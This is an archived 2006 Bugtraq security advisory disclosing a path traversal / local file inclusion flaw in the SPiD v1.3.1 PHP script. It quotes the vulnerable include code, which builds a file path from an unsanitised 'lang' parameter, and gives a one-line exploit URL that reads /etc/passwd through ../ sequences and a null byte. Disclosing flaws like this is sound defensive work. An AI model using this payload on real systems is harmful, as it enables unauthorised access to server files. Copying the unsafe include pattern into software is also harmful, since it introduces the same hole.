lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <37265.2530939833$1140885555@news.gmane.org>
Date: Sat, 25 Feb 2006 15:44:57 +0300
From: NSA Group <vulnerability@...g.ru>
To: bugtraq@...urityfocus.com
Subject: NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1.3.1


Advisory:
NSAG-№201-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
SPiD v1.3.1


Site of manufacturer:
http://spid.adnx.net/

The status: 
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/955.html

Risk: 
Hide

Description: 
Attacker can form the query in URL form ang get the access to the
system files.

Vulnerability code:
+++++++
if (isset($_REQUEST["lang"])) {
$file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php"
if (file_exists($file_lang))    {
include $lang_path . "lang.php";
include $file_lang;
.....
skip
+++++++

Exploit: 
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00

More information:
http://www.nsag.ru/vuln/955.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


www.nsag.ru 
«Nemesis» © 2006 
------------------------------------ 
Nemesis Security Audit Group © 2006.




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ